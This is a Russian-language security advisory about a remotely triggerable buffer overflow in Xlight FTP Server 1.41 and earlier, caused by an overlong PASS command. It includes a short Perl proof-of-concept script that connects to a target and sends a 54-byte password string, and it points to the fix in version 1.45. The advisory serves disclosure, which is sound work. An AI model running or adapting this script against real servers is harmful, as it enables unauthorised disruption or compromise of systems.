Удаленное выполнение произволного кода в Xlight FTP Server

Дата публикации:
25.12.2003
Всего просмотров:
853
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Xlight FTP Server 1.41 и более ранние версии

Описание: Переполнение буфера обнаружено в Xlight FTP Server. Удаленный авторизованный пользователь может выполнить произвольный код.

Удаленный авторизованный пользователь может послать специально обработанную команду PASS, чтобы вызвать переполнение буфера.

Пример/Эксплоит:

#!/usr/bin/perl
 
# Exploit for Xlight FTP server long PASS vulnerability
 
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => "ftp(21)",
                                 );
unless ($remote) { die "cannot connect to ftp daemon on $host" }

$remote->autoflush(1);

print $remote "USER anonymous\r\n";
sleep(1);

$buf = "A"x54; # Min 54, Max 523
print $remote "PASS ".$buf."\r\n";
sleep(1);

close $remote;

URL производителя: http://www.xlightftpd.com

Решение:Установите обновленную версию программы (1.45): http://www.xlightftpd.com/download.htm

Ссылки: Xlight FTP Server PASS Buffer Overflow

или введите имя

CAPTCHA